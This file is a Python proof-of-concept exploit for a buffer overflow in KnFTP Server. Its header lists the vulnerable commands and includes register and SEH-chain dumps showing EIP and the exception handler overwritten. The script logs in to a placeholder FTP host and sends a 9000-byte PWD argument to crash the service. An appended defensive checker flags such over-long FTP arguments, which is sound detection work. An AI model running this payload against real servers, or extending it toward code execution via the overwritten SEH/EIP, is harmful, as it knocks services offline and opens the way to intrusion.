#!/usr/bin/python
# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/
# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwritten.
# It's almost like this application was made to be vulnerable.
# Anyway have fun.
#
# Register dump at the crash, MKD command:
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#           3 2 1 0  E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask 1 1 1 1 1 1
#
# Register dump at the crash, LS command:
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#           3 2 1 0  E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask 1 1 1 1 1 1
#
#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141
#
# Register dump at the crash, ABOR command:
#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDD000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#           3 2 1 0  E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask 1 1 1 1 1 1

import socket

# 9000 bytes of 'A' (0x41); the dumps above show EDX, EIP and the SE handler
# ending up as 41414141. Byte literals so this runs under Python 2 and 3.
buffer = b"\x41" * 9000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('xxx.xxx.xxx.xxx', 21))   # target address left as the original placeholder
s.recv(1024)
s.send(b'USER test\r\n')
s.recv(1024)
s.send(b'PASS test\r\n')
s.recv(1024)
s.send(b'PWD ' + buffer + b'\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.close()
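A defensive counterpart, added here and not part of the original PoC: a small checker that parses FTP control-channel command lines and flags the over-long, single-byte-filled arguments this script sends (the 512-byte argument cap and 64-byte repeat-run threshold are assumptions, and the sample session is constructed).

```python
"""Flag FTP control-channel commands that look like the overflow attempt above."""
import re

# Verbs the PoC header lists as crashing KnFTP; any verb with a huge argument is flagged.
KNOWN_BAD_VERBS = {b"MKD", b"LS", b"ABOR", b"CD", b"APPE", b"REST", b"PWD"}
MAX_ARG_LEN = 512        # assumption: no legitimate client sends arguments this long
MAX_REPEAT_RUN = 64      # assumption: a run of one byte this long is filler, not a path

_CMD_RE = re.compile(rb"^([A-Za-z]{1,4})(?:[ \t]+(.*?))?\r?\n?$", re.DOTALL)
_RUN_RE = re.compile(rb"(.)\1{%d,}" % (MAX_REPEAT_RUN - 1), re.DOTALL)


def parse_command(line):
    """Split one control-channel line into (VERB, argument bytes); (None, b'') if unparseable."""
    m = _CMD_RE.match(line)
    if not m:
        return None, b""
    return m.group(1).upper(), m.group(2) or b""


def check_line(line):
    """Return the reasons this line looks like an overflow attempt, or [] if it looks clean."""
    verb, arg = parse_command(line)
    if verb is None:
        return ["unparseable"]
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("arg_len=%d>%d" % (len(arg), MAX_ARG_LEN))
    if _RUN_RE.search(arg):
        reasons.append("repeated_byte_filler")
    if reasons and verb in KNOWN_BAD_VERBS:
        reasons.append("verb_%s_known_vulnerable" % verb.decode("ascii"))
    return reasons


def scan(lines):
    """Return [(index, verb, reasons)] for every suspicious line in a captured session."""
    return [(i, parse_command(ln)[0], check_line(ln))
            for i, ln in enumerate(lines) if check_line(ln)]


# Constructed sample session: a normal login and CWD, then the PoC's 9000-byte PWD.
SAMPLE_SESSION = [
    b"USER test\r\n", b"PASS test\r\n", b"PWD\r\n", b"CWD /pub/incoming\r\n",
    b"PWD " + b"\x41" * 9000 + b"\r\n", b"QUIT\r\n",
]

if __name__ == "__main__":
    for idx, verb, why in scan(SAMPLE_SESSION):
        print("line %d: %s flagged: %s" % (idx, verb.decode(), ", ".join(why)))
```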